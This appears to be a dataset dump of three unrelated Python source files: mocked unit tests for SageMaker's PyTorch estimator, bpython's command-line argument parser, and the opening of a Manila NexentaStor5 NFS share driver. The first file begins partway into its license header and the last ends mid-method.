# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import logging
import json
import os
import pytest
import sys
from mock import ANY, MagicMock, Mock, patch
from sagemaker.pytorch import defaults
from sagemaker.pytorch import PyTorch
from sagemaker.pytorch import PyTorchPredictor, PyTorchModel
DATA_DIR = os.path.join(os.path.dirname(__file__), "..", "data")
SCRIPT_PATH = os.path.join(DATA_DIR, "dummy_script.py")
SERVING_SCRIPT_FILE = "another_dummy_script.py"
MODEL_DATA = "s3://some/data.tar.gz"
TIMESTAMP = "2017-11-06-14:14:15.672"
TIME = 1507167947
BUCKET_NAME = "mybucket"
INSTANCE_COUNT = 1
INSTANCE_TYPE = "ml.c4.4xlarge"
ACCELERATOR_TYPE = "ml.eia.medium"
PYTHON_VERSION = "py" + str(sys.version_info.major)
IMAGE_NAME = "sagemaker-pytorch"
JOB_NAME = "{}-{}".format(IMAGE_NAME, TIMESTAMP)
IMAGE_URI_FORMAT_STRING = "520713654638.dkr.ecr.{}.amazonaws.com/{}:{}-{}-{}"
ROLE = "Dummy"
REGION = "us-west-2"
GPU = "ml.p2.xlarge"
CPU = "ml.c4.xlarge"
ENDPOINT_DESC = {"EndpointConfigName": "test-endpoint"}
ENDPOINT_CONFIG_DESC = {"ProductionVariants": [{"ModelName": "model-1"}, {"ModelName": "model-2"}]}
LIST_TAGS_RESULT = {"Tags": [{"Key": "TagtestKey", "Value": "TagtestValue"}]}
EXPERIMENT_CONFIG = {
"ExperimentName": "exp",
"TrialName": "trial",
"TrialComponentDisplayName": "tc",
}
@pytest.fixture(name="sagemaker_session")
def fixture_sagemaker_session():
boto_mock = Mock(name="boto_session", region_name=REGION)
session = Mock(
name="sagemaker_session",
boto_session=boto_mock,
boto_region_name=REGION,
config=None,
local_mode=False,
s3_resource=None,
s3_client=None,
)
describe = {"ModelArtifacts": {"S3ModelArtifacts": "s3://m/m.tar.gz"}}
session.sagemaker_client.describe_training_job = Mock(return_value=describe)
session.sagemaker_client.describe_endpoint = Mock(return_value=ENDPOINT_DESC)
session.sagemaker_client.describe_endpoint_config = Mock(return_value=ENDPOINT_CONFIG_DESC)
session.sagemaker_client.list_tags = Mock(return_value=LIST_TAGS_RESULT)
session.default_bucket = Mock(name="default_bucket", return_value=BUCKET_NAME)
session.expand_role = Mock(name="expand_role", return_value=ROLE)
return session
def _get_full_cpu_image_uri(version, py_version=PYTHON_VERSION):
return IMAGE_URI_FORMAT_STRING.format(REGION, IMAGE_NAME, version, "cpu", py_version)
def _get_full_gpu_image_uri(version, py_version=PYTHON_VERSION):
return IMAGE_URI_FORMAT_STRING.format(REGION, IMAGE_NAME, version, "gpu", py_version)
def _get_full_cpu_image_uri_with_ei(version, py_version=PYTHON_VERSION):
return _get_full_cpu_image_uri(version, py_version=py_version) + "-eia"
def _pytorch_estimator(
sagemaker_session,
framework_version=defaults.PYTORCH_VERSION,
train_instance_type=None,
base_job_name=None,
**kwargs
):
return PyTorch(
entry_point=SCRIPT_PATH,
framework_version=framework_version,
py_version=PYTHON_VERSION,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=train_instance_type if train_instance_type else INSTANCE_TYPE,
base_job_name=base_job_name,
**kwargs
)
def _create_train_job(version):
return {
"image": _get_full_cpu_image_uri(version),
"input_mode": "File",
"input_config": [
{
"ChannelName": "training",
"DataSource": {
"S3DataSource": {
"S3DataDistributionType": "FullyReplicated",
"S3DataType": "S3Prefix",
}
},
}
],
"role": ROLE,
"job_name": JOB_NAME,
"output_config": {"S3OutputPath": "s3://{}/".format(BUCKET_NAME)},
"resource_config": {
"InstanceType": "ml.c4.4xlarge",
"InstanceCount": 1,
"VolumeSizeInGB": 30,
},
"hyperparameters": {
"sagemaker_program": json.dumps("dummy_script.py"),
"sagemaker_enable_cloudwatch_metrics": "false",
"sagemaker_container_log_level": str(logging.INFO),
"sagemaker_job_name": json.dumps(JOB_NAME),
"sagemaker_submit_directory": json.dumps(
"s3://{}/{}/source/sourcedir.tar.gz".format(BUCKET_NAME, JOB_NAME)
),
"sagemaker_region": '"us-west-2"',
},
"stop_condition": {"MaxRuntimeInSeconds": 24 * 60 * 60},
"tags": None,
"vpc_config": None,
"metric_definitions": None,
"experiment_config": None,
"debugger_hook_config": {
"CollectionConfigurations": [],
"S3OutputPath": "s3://{}/".format(BUCKET_NAME),
},
}
def test_create_model(sagemaker_session, pytorch_version):
container_log_level = '"logging.INFO"'
source_dir = "s3://mybucket/source"
pytorch = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
framework_version=pytorch_version,
container_log_level=container_log_level,
base_job_name="job",
source_dir=source_dir,
)
job_name = "new_name"
pytorch.fit(inputs="s3://mybucket/train", job_name="new_name")
model = pytorch.create_model()
assert model.sagemaker_session == sagemaker_session
assert model.framework_version == pytorch_version
assert model.py_version == pytorch.py_version
assert model.entry_point == SCRIPT_PATH
assert model.role == ROLE
assert model.name == job_name
assert model.container_log_level == container_log_level
assert model.source_dir == source_dir
assert model.vpc_config is None
def test_create_model_with_optional_params(sagemaker_session):
container_log_level = '"logging.INFO"'
source_dir = "s3://mybucket/source"
enable_cloudwatch_metrics = "true"
pytorch = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
container_log_level=container_log_level,
base_job_name="job",
source_dir=source_dir,
enable_cloudwatch_metrics=enable_cloudwatch_metrics,
)
pytorch.fit(inputs="s3://mybucket/train", job_name="new_name")
new_role = "role"
model_server_workers = 2
vpc_config = {"Subnets": ["foo"], "SecurityGroupIds": ["bar"]}
model = pytorch.create_model(
role=new_role,
model_server_workers=model_server_workers,
vpc_config_override=vpc_config,
entry_point=SERVING_SCRIPT_FILE,
)
assert model.role == new_role
assert model.model_server_workers == model_server_workers
assert model.vpc_config == vpc_config
assert model.entry_point == SERVING_SCRIPT_FILE
def test_create_model_with_custom_image(sagemaker_session):
container_log_level = '"logging.INFO"'
source_dir = "s3://mybucket/source"
image = "pytorch:9000"
pytorch = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
container_log_level=container_log_level,
image_name=image,
base_job_name="job",
source_dir=source_dir,
)
job_name = "new_name"
pytorch.fit(inputs="s3://mybucket/train", job_name="new_name")
model = pytorch.create_model()
assert model.sagemaker_session == sagemaker_session
assert model.image == image
assert model.entry_point == SCRIPT_PATH
assert model.role == ROLE
assert model.name == job_name
assert model.container_log_level == container_log_level
assert model.source_dir == source_dir
@patch("sagemaker.utils.create_tar_file", MagicMock())
@patch("time.strftime", return_value=TIMESTAMP)
def test_pytorch(strftime, sagemaker_session, pytorch_version):
pytorch = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
framework_version=pytorch_version,
py_version=PYTHON_VERSION,
)
inputs = "s3://mybucket/train"
pytorch.fit(inputs=inputs, experiment_config=EXPERIMENT_CONFIG)
sagemaker_call_names = [c[0] for c in sagemaker_session.method_calls]
assert sagemaker_call_names == ["train", "logs_for_job"]
boto_call_names = [c[0] for c in sagemaker_session.boto_session.method_calls]
assert boto_call_names == ["resource"]
expected_train_args = _create_train_job(pytorch_version)
expected_train_args["input_config"][0]["DataSource"]["S3DataSource"]["S3Uri"] = inputs
expected_train_args["experiment_config"] = EXPERIMENT_CONFIG
actual_train_args = sagemaker_session.method_calls[0][2]
assert actual_train_args == expected_train_args
model = pytorch.create_model()
expected_image_base = "520713654638.dkr.ecr.us-west-2.amazonaws.com/sagemaker-pytorch:{}-gpu-{}"
assert {
"Environment": {
"SAGEMAKER_SUBMIT_DIRECTORY": "s3://mybucket/sagemaker-pytorch-{}/source/sourcedir.tar.gz".format(
TIMESTAMP
),
"SAGEMAKER_PROGRAM": "dummy_script.py",
"SAGEMAKER_ENABLE_CLOUDWATCH_METRICS": "false",
"SAGEMAKER_REGION": "us-west-2",
"SAGEMAKER_CONTAINER_LOG_LEVEL": "20",
},
"Image": expected_image_base.format(pytorch_version, PYTHON_VERSION),
"ModelDataUrl": "s3://m/m.tar.gz",
} == model.prepare_container_def(GPU)
assert "cpu" in model.prepare_container_def(CPU)["Image"]
predictor = pytorch.deploy(1, GPU)
assert isinstance(predictor, PyTorchPredictor)
@patch("sagemaker.utils.create_tar_file", MagicMock())
def test_model(sagemaker_session):
model = PyTorchModel(
MODEL_DATA, role=ROLE, entry_point=SCRIPT_PATH, sagemaker_session=sagemaker_session
)
predictor = model.deploy(1, GPU)
assert isinstance(predictor, PyTorchPredictor)
@patch("sagemaker.utils.create_tar_file", MagicMock())
@patch("sagemaker.utils.repack_model")
def test_mms_model(repack_model, sagemaker_session):
PyTorchModel(
MODEL_DATA,
role=ROLE,
entry_point=SCRIPT_PATH,
sagemaker_session=sagemaker_session,
framework_version="1.2",
).deploy(1, GPU)
repack_model.assert_called_with(
dependencies=[],
inference_script=SCRIPT_PATH,
kms_key=None,
model_uri="s3://some/data.tar.gz",
repacked_model_uri=ANY,
sagemaker_session=sagemaker_session,
source_directory=None,
)
@patch("sagemaker.utils.create_tar_file", MagicMock())
@patch("sagemaker.utils.repack_model")
def test_non_mms_model(repack_model, sagemaker_session):
PyTorchModel(
MODEL_DATA,
role=ROLE,
entry_point=SCRIPT_PATH,
sagemaker_session=sagemaker_session,
framework_version="1.1",
).deploy(1, GPU)
repack_model.assert_not_called()
@patch("sagemaker.fw_utils.tar_and_upload_dir", MagicMock())
def test_model_image_accelerator(sagemaker_session):
with pytest.raises(ValueError) as error:
model = PyTorchModel(
MODEL_DATA,
role=ROLE,
entry_point=SCRIPT_PATH,
sagemaker_session=sagemaker_session,
framework_version="1.3.1",
py_version="py2",
)
model.deploy(1, CPU, accelerator_type=ACCELERATOR_TYPE)
assert "pytorch-serving is not supported with Amazon Elastic Inference in Python 2." in str(
error
)
def test_train_image_default(sagemaker_session):
pytorch = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
)
assert (
_get_full_cpu_image_uri(defaults.PYTORCH_VERSION, defaults.PYTHON_VERSION)
in pytorch.train_image()
)
def test_train_image_cpu_instances(sagemaker_session, pytorch_version):
pytorch = _pytorch_estimator(
sagemaker_session, pytorch_version, train_instance_type="ml.c2.2xlarge"
)
assert pytorch.train_image() == _get_full_cpu_image_uri(pytorch_version)
pytorch = _pytorch_estimator(
sagemaker_session, pytorch_version, train_instance_type="ml.c4.2xlarge"
)
assert pytorch.train_image() == _get_full_cpu_image_uri(pytorch_version)
pytorch = _pytorch_estimator(sagemaker_session, pytorch_version, train_instance_type="ml.m16")
assert pytorch.train_image() == _get_full_cpu_image_uri(pytorch_version)
def test_train_image_gpu_instances(sagemaker_session, pytorch_version):
pytorch = _pytorch_estimator(
sagemaker_session, pytorch_version, train_instance_type="ml.g2.2xlarge"
)
assert pytorch.train_image() == _get_full_gpu_image_uri(pytorch_version)
pytorch = _pytorch_estimator(
sagemaker_session, pytorch_version, train_instance_type="ml.p2.2xlarge"
)
assert pytorch.train_image() == _get_full_gpu_image_uri(pytorch_version)
def test_attach(sagemaker_session, pytorch_version):
training_image = "1.dkr.ecr.us-west-2.amazonaws.com/sagemaker-pytorch:{}-cpu-{}".format(
pytorch_version, PYTHON_VERSION
)
returned_job_description = {
"AlgorithmSpecification": {"TrainingInputMode": "File", "TrainingImage": training_image},
"HyperParameters": {
"sagemaker_submit_directory": '"s3://some/sourcedir.tar.gz"',
"sagemaker_program": '"iris-dnn-classifier.py"',
"sagemaker_s3_uri_training": '"sagemaker-3/integ-test-data/tf_iris"',
"sagemaker_enable_cloudwatch_metrics": "false",
"sagemaker_container_log_level": '"logging.INFO"',
"sagemaker_job_name": '"neo"',
"training_steps": "100",
"sagemaker_region": '"us-west-2"',
},
"RoleArn": "arn:aws:iam::366:role/SageMakerRole",
"ResourceConfig": {
"VolumeSizeInGB": 30,
"InstanceCount": 1,
"InstanceType": "ml.c4.xlarge",
},
"StoppingCondition": {"MaxRuntimeInSeconds": 24 * 60 * 60},
"TrainingJobName": "neo",
"TrainingJobStatus": "Completed",
"TrainingJobArn": "arn:aws:sagemaker:us-west-2:336:training-job/neo",
"OutputDataConfig": {"KmsKeyId": "", "S3OutputPath": "s3://place/output/neo"},
"TrainingJobOutput": {"S3TrainingJobOutput": "s3://here/output.tar.gz"},
}
sagemaker_session.sagemaker_client.describe_training_job = Mock(
name="describe_training_job", return_value=returned_job_description
)
estimator = PyTorch.attach(training_job_name="neo", sagemaker_session=sagemaker_session)
assert estimator.latest_training_job.job_name == "neo"
assert estimator.py_version == PYTHON_VERSION
assert estimator.framework_version == pytorch_version
assert estimator.role == "arn:aws:iam::366:role/SageMakerRole"
assert estimator.train_instance_count == 1
assert estimator.train_max_run == 24 * 60 * 60
assert estimator.input_mode == "File"
assert estimator.base_job_name == "neo"
assert estimator.output_path == "s3://place/output/neo"
assert estimator.output_kms_key == ""
assert estimator.hyperparameters()["training_steps"] == "100"
assert estimator.source_dir == "s3://some/sourcedir.tar.gz"
assert estimator.entry_point == "iris-dnn-classifier.py"
def test_attach_wrong_framework(sagemaker_session):
rjd = {
"AlgorithmSpecification": {
"TrainingInputMode": "File",
"TrainingImage": "1.dkr.ecr.us-west-2.amazonaws.com/sagemaker-mxnet-py2-cpu:1.0.4",
},
"HyperParameters": {
"sagemaker_submit_directory": '"s3://some/sourcedir.tar.gz"',
"checkpoint_path": '"s3://other/1508872349"',
"sagemaker_program": '"iris-dnn-classifier.py"',
"sagemaker_enable_cloudwatch_metrics": "false",
"sagemaker_container_log_level": '"logging.INFO"',
"training_steps": "100",
"sagemaker_region": '"us-west-2"',
},
"RoleArn": "arn:aws:iam::366:role/SageMakerRole",
"ResourceConfig": {
"VolumeSizeInGB": 30,
"InstanceCount": 1,
"InstanceType": "ml.c4.xlarge",
},
"StoppingCondition": {"MaxRuntimeInSeconds": 24 * 60 * 60},
"TrainingJobName": "neo",
"TrainingJobStatus": "Completed",
"TrainingJobArn": "arn:aws:sagemaker:us-west-2:336:training-job/neo",
"OutputDataConfig": {"KmsKeyId": "", "S3OutputPath": "s3://place/output/neo"},
"TrainingJobOutput": {"S3TrainingJobOutput": "s3://here/output.tar.gz"},
}
sagemaker_session.sagemaker_client.describe_training_job = Mock(
name="describe_training_job", return_value=rjd
)
with pytest.raises(ValueError) as error:
PyTorch.attach(training_job_name="neo", sagemaker_session=sagemaker_session)
assert "didn't use image for requested framework" in str(error)
def test_attach_custom_image(sagemaker_session):
training_image = "pytorch:latest"
returned_job_description = {
"AlgorithmSpecification": {"TrainingInputMode": "File", "TrainingImage": training_image},
"HyperParameters": {
"sagemaker_submit_directory": '"s3://some/sourcedir.tar.gz"',
"sagemaker_program": '"iris-dnn-classifier.py"',
"sagemaker_s3_uri_training": '"sagemaker-3/integ-test-data/tf_iris"',
"sagemaker_enable_cloudwatch_metrics": "false",
"sagemaker_container_log_level": '"logging.INFO"',
"sagemaker_job_name": '"neo"',
"training_steps": "100",
"sagemaker_region": '"us-west-2"',
},
"RoleArn": "arn:aws:iam::366:role/SageMakerRole",
"ResourceConfig": {
"VolumeSizeInGB": 30,
"InstanceCount": 1,
"InstanceType": "ml.c4.xlarge",
},
"StoppingCondition": {"MaxRuntimeInSeconds": 24 * 60 * 60},
"TrainingJobName": "neo",
"TrainingJobStatus": "Completed",
"TrainingJobArn": "arn:aws:sagemaker:us-west-2:336:training-job/neo",
"OutputDataConfig": {"KmsKeyId": "", "S3OutputPath": "s3://place/output/neo"},
"TrainingJobOutput": {"S3TrainingJobOutput": "s3://here/output.tar.gz"},
}
sagemaker_session.sagemaker_client.describe_training_job = Mock(
name="describe_training_job", return_value=returned_job_description
)
estimator = PyTorch.attach(training_job_name="neo", sagemaker_session=sagemaker_session)
assert estimator.latest_training_job.job_name == "neo"
assert estimator.image_name == training_image
assert estimator.train_image() == training_image
@patch("sagemaker.pytorch.estimator.python_deprecation_warning")
def test_estimator_py2_warning(warning, sagemaker_session):
estimator = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
py_version="py2",
)
assert estimator.py_version == "py2"
warning.assert_called_with(estimator.__framework_name__, defaults.LATEST_PY2_VERSION)
@patch("sagemaker.pytorch.model.python_deprecation_warning")
def test_model_py2_warning(warning, sagemaker_session):
model = PyTorchModel(
MODEL_DATA,
role=ROLE,
entry_point=SCRIPT_PATH,
sagemaker_session=sagemaker_session,
py_version="py2",
)
assert model.py_version == "py2"
warning.assert_called_with(model.__framework_name__, defaults.LATEST_PY2_VERSION)
@patch("sagemaker.pytorch.estimator.empty_framework_version_warning")
def test_empty_framework_version(warning, sagemaker_session):
estimator = PyTorch(
entry_point=SCRIPT_PATH,
role=ROLE,
sagemaker_session=sagemaker_session,
train_instance_count=INSTANCE_COUNT,
train_instance_type=INSTANCE_TYPE,
framework_version=None,
)
assert estimator.framework_version == defaults.PYTORCH_VERSION
warning.assert_called_with(defaults.PYTORCH_VERSION, estimator.LATEST_VERSION)
@patch("sagemaker.pytorch.model.empty_framework_version_warning")
def test_model_empty_framework_version(warning, sagemaker_session):
model = PyTorchModel(
MODEL_DATA,
role=ROLE,
entry_point=SCRIPT_PATH,
sagemaker_session=sagemaker_session,
framework_version=None,
)
assert model.framework_version == defaults.PYTORCH_VERSION
warning.assert_called_with(defaults.PYTORCH_VERSION, defaults.LATEST_VERSION)
def test_pt_enable_sm_metrics(sagemaker_session):
pytorch = _pytorch_estimator(sagemaker_session, enable_sagemaker_metrics=True)
assert pytorch.enable_sagemaker_metrics
def test_pt_disable_sm_metrics(sagemaker_session):
pytorch = _pytorch_estimator(sagemaker_session, enable_sagemaker_metrics=False)
assert not pytorch.enable_sagemaker_metrics
def test_pt_disable_sm_metrics_if_pt_ver_is_less_than_1_15(sagemaker_session):
for fw_version in ["1.1", "1.2"]:
pytorch = _pytorch_estimator(sagemaker_session, framework_version=fw_version)
assert pytorch.enable_sagemaker_metrics is None
def test_pt_enable_sm_metrics_if_fw_ver_is_at_least_1_15(sagemaker_session):
for fw_version in ["1.3", "1.4", "2.0", "2.1"]:
pytorch = _pytorch_estimator(sagemaker_session, framework_version=fw_version)
assert pytorch.enable_sagemaker_metrics
def test_custom_image_estimator_deploy(sagemaker_session):
custom_image = "mycustomimage:latest"
pytorch = _pytorch_estimator(sagemaker_session)
pytorch.fit(inputs="s3://mybucket/train", job_name="new_name")
model = pytorch.create_model(image=custom_image)
assert model.image == custom_image
|
the-stack_106_19086
|
# The MIT License
#
# Copyright (c) 2008 Bob Farrell
# Copyright (c) 2012-2021 Sebastian Ramacher
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# To gradually migrate to mypy we aren't setting these globally yet
# mypy: disallow_untyped_defs=True
# mypy: disallow_untyped_calls=True
"""
Module to handle command line argument parsing, for all front-ends.
"""
import argparse
from typing import Tuple, List, Optional, NoReturn, Callable
import code
import curtsies
import cwcwidth
import greenlet
import importlib.util
import logging
import os
import pygments
import requests
import sys
from pathlib import Path
from . import __version__, __copyright__
from .config import default_config_path, Config
from .translations import _
logger = logging.getLogger(__name__)
class ArgumentParserFailed(ValueError):
"""Raised by the RaisingOptionParser for a bogus commandline."""
class RaisingArgumentParser(argparse.ArgumentParser):
def error(self, msg: str) -> NoReturn:
raise ArgumentParserFailed()
def version_banner(base: str = "bpython") -> str:
return _("{} version {} on top of Python {} {}").format(
base,
__version__,
sys.version.split()[0],
sys.executable,
)
def copyright_banner() -> str:
return _("{} See AUTHORS.rst for details.").format(__copyright__)
Options = Tuple[str, str, Callable[[argparse._ArgumentGroup], None]]
def parse(
args: Optional[List[str]],
extras: Optional[Options] = None,
ignore_stdin: bool = False,
) -> Tuple[Config, argparse.Namespace, List[str]]:
"""Receive an argument list - if None, use sys.argv - parse all args and
take appropriate action. Also receive optional extra argument: this should
be a tuple of (title, description, callback)
title: The title for the argument group
description: A full description of the argument group
callback: A callback that adds argument to the argument group
e.g.:
def callback(group):
group.add_argument('-f', action='store_true', dest='f', help='Explode')
group.add_argument('-l', action='store_true', dest='l', help='Love')
parse(
['-i', '-m', 'foo.py'],
(
'Front end-specific options',
'A full description of what these options are for',
callback
),
)
Return a tuple of (config, options, exec_args) wherein "config" is the
config object either parsed from a default/specified config file or default
config options, "options" is the parsed options from
ArgumentParser.parse_args, and "exec_args" are the args (if any) to be parsed
to the executed file (if any).
"""
if args is None:
args = sys.argv[1:]
parser = RaisingArgumentParser(
usage=_(
"Usage: %(prog)s [options] [file [args]]\n"
"NOTE: If bpython sees an argument it does "
"not know, execution falls back to the "
"regular Python interpreter."
)
)
parser.add_argument(
"--config",
default=default_config_path(),
type=Path,
help=_("Use CONFIG instead of default config file."),
)
parser.add_argument(
"--interactive",
"-i",
action="store_true",
help=_("Drop to bpython shell after running file instead of exiting."),
)
parser.add_argument(
"--quiet",
"-q",
action="store_true",
help=_("Don't flush the output to stdout."),
)
parser.add_argument(
"--version",
"-V",
action="store_true",
help=_("Print version and exit."),
)
parser.add_argument(
"--log-level",
"-l",
choices=("debug", "info", "warning", "error", "critical"),
default="error",
help=_("Set log level for logging"),
)
parser.add_argument(
"--log-output",
"-L",
help=_("Log output file"),
)
if extras is not None:
extras_group = parser.add_argument_group(extras[0], extras[1])
extras[2](extras_group)
# collect all the remaining arguments into a list
parser.add_argument(
"args",
nargs=argparse.REMAINDER,
help=_(
"File to execute and additional arguments passed on to the executed script."
),
)
try:
options = parser.parse_args(args)
except ArgumentParserFailed:
# Just let Python handle this
os.execv(sys.executable, [sys.executable] + args)
if options.version:
print(version_banner())
print(copyright_banner())
raise SystemExit
if not ignore_stdin and not (sys.stdin.isatty() and sys.stdout.isatty()):
# Just let Python handle this
os.execv(sys.executable, [sys.executable] + args)
# Configure logging handler
bpython_logger = logging.getLogger("bpython")
curtsies_logger = logging.getLogger("curtsies")
bpython_logger.setLevel(options.log_level.upper())
curtsies_logger.setLevel(options.log_level.upper())
if options.log_output:
handler = logging.FileHandler(filename=options.log_output)
handler.setFormatter(
logging.Formatter(
"%(asctime)s: %(name)s: %(levelname)s: %(message)s"
)
)
bpython_logger.addHandler(handler)
curtsies_logger.addHandler(handler)
bpython_logger.propagate = curtsies_logger.propagate = False
else:
bpython_logger.addHandler(logging.NullHandler())
curtsies_logger.addHandler(logging.NullHandler())
logger.info(f"Starting bpython {__version__}")
logger.info(f"Python {sys.executable}: {sys.version_info}")
logger.info(f"curtsies: {curtsies.__version__}")
logger.info(f"cwcwidth: {cwcwidth.__version__}")
logger.info(f"greenlet: {greenlet.__version__}")
logger.info(f"pygments: {pygments.__version__}") # type: ignore
logger.info(f"requests: {requests.__version__}")
logger.info(
"environment:\n{}".format(
"\n".join(
f"{key}: {value}"
for key, value in sorted(os.environ.items())
if key.startswith("LC")
or key.startswith("LANG")
or key == "TERM"
)
)
)
return Config(options.config), options, options.args
def exec_code(
interpreter: code.InteractiveInterpreter, args: List[str]
) -> None:
"""
Helper to execute code in a given interpreter, e.g. to implement the behavior of python3 [-i] file.py
args should be a [faked] sys.argv.
"""
try:
with open(args[0]) as sourcefile:
source = sourcefile.read()
except OSError as e:
# print an error and exit (if -i is specified the calling code will continue)
print(f"bpython: can't open file '{args[0]}: {e}", file=sys.stderr)
raise SystemExit(e.errno)
old_argv, sys.argv = sys.argv, args
sys.path.insert(0, os.path.abspath(os.path.dirname(args[0])))
spec = importlib.util.spec_from_loader("__console__", loader=None)
assert spec
mod = importlib.util.module_from_spec(spec)
sys.modules["__console__"] = mod
interpreter.locals.update(mod.__dict__) # type: ignore # TODO use a more specific type that has a .locals attribute
interpreter.locals["__file__"] = args[0] # type: ignore # TODO use a more specific type that has a .locals attribute
interpreter.runsource(source, args[0], "exec")
sys.argv = old_argv
|
the-stack_106_19087
|
# Copyright 2016 Nexenta Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from oslo_utils import units
from manila.common import constants as common
from manila import exception
from manila.i18n import _, _LW, _LE
from manila.share import driver
from manila.share.drivers.nexenta.ns5 import jsonrpc
from manila.share.drivers.nexenta import options
from manila.share.drivers.nexenta import utils
PATH_DELIMITER = '%2F'
VERSION = '1.0'
LOG = log.getLogger(__name__)
class NexentaNasDriver(driver.ShareDriver):
"""Nexenta Share Driver.
Executes commands relating to Shares.
API version history:
1.0 - Initial version.
"""
driver_prefix = 'nexenta'
def __init__(self, *args, **kwargs):
"""Do initialization."""
LOG.debug('Initializing Nexenta driver.')
super(NexentaNasDriver, self).__init__(False, *args, **kwargs)
self.configuration = kwargs.get('configuration')
if self.configuration:
self.configuration.append_config_values(
options.nexenta_connection_opts)
self.configuration.append_config_values(
options.nexenta_nfs_opts)
self.configuration.append_config_values(
options.nexenta_dataset_opts)
else:
raise exception.BadConfigurationException(
reason=_('Nexenta configuration missing.'))
self.nef = None
self.nef_protocol = self.configuration.nexenta_rest_protocol
self.nef_host = self.configuration.nexenta_host
self.nef_port = self.configuration.nexenta_rest_port
self.nef_user = self.configuration.nexenta_user
self.nef_password = self.configuration.nexenta_password
self.pool_name = self.configuration.nexenta_pool
self.fs_prefix = self.configuration.nexenta_nfs_share
self.storage_protocol = 'NFS'
self.nfs_mount_point_base = self.configuration.nexenta_mount_point_base
self.dataset_compression = (
self.configuration.nexenta_dataset_compression)
self.provisioned_capacity = 0
@property
def share_backend_name(self):
if not hasattr(self, '_share_backend_name'):
self._share_backend_name = None
if self.configuration:
self._share_backend_name = self.configuration.safe_get(
'share_backend_name')
if not self._share_backend_name:
self._share_backend_name = 'NexentaStor5'
return self._share_backend_name
def do_setup(self, context):
"""Any initialization the nexenta nas driver does while starting."""
if self.nef_protocol == 'auto':
protocol = 'https'
else:
protocol = self.nef_protocol
self.nef = jsonrpc.NexentaJSONProxy(
protocol, self.nef_host, self.nef_port, self.nef_user,
self.nef_password)
def check_for_setup_error(self):
"""Verify that the volume for our folder exists.
:raise: :py:exc:`LookupError`
"""
url = 'storage/pools/{}'.format(self.pool_name)
if not self.nef.get(url):
raise LookupError(
_("Pool {} does not exist in Nexenta Store appliance").format(
self.pool_name))
url = 'storage/pools/{}/filesystems/{}'.format(self.pool_name,
self.fs_prefix)
if not self.nef.get(url):
raise LookupError(
_("filesystem {} does not exist in Nexenta Store "
"appliance").format(self.fs_prefix))
path = '/'.join((self.pool_name, self.fs_prefix))
shared = False
response = self.nef.get('nas/nfs')
for share in response['data']:
if share.get('filesystem') == path:
shared = True
break
if not shared:
raise LookupError(_(
"Dataset {} is not shared in Nexenta Store appliance").format(
path))
self._get_provisioned_capacity()
def _get_provisioned_capacity(self):
path = '%(pool)s/%(fs)s' % {
'pool': self.pool_name, 'fs': self.fs_prefix}
url = 'storage/filesystems?parent=%s' % path
fs_list = self.nef.get(url)['data']
for fs in fs_list:
if fs['path'] != path:
self.provisioned_capacity += fs['quotaSize'] / units.Gi
def create_share(self, context, share, share_server=None):
"""Create a share."""
LOG.debug('Creating share: %s.', share['name'])
data = {
'recordSize': 4 * units.Ki,
'compressionMode': self.dataset_compression,
'name': '/'.join((self.fs_prefix, share['name'])),
'quotaSize': share['size'] * units.Gi,
}
if not self.configuration.nexenta_thin_provisioning:
data['reservationSize'] = share['size'] * units.Gi
url = 'storage/pools/{}/filesystems'.format(self.pool_name)
self.nef.post(url, data)
location = {
'path': '{}:/{}/{}/{}'.format(self.nef_host, self.pool_name,
self.fs_prefix, share['name'])
}
try:
self._add_permission(share['name'])
except exception.NexentaException:
try:
self.delete_share(None, share)
except exception.NexentaException as exc:
LOG.warning(_LW(
"Cannot destroy created filesystem: %(vol)s/%(folder)s, "
"exception: %(exc)s"),
{'vol': self.pool_name, 'folder': '/'.join(
(self.fs_prefix, share['name'])), 'exc': exc})
raise
self.provisioned_capacity += share['size']
